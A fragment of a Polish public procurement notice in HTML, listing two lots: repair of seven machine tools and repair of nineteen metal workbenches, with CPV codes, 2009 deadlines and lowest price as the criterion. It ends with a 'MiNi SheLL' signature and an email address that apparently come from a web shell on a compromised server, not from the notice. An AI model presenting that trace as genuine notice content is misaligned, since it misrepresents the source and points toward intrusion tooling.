<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część VIII. 	REMONT  OBRABIAREK						7 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> REMONT  STOŁÓW  WARSZTATOWYCH.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część IX. 	REMONT  STOŁÓW  WARSZTATOWYCH
1. stół metalowy dwustanowiskowy						          16 szt.
2. stół metalowy jednostanowiskowy						3 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.85.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com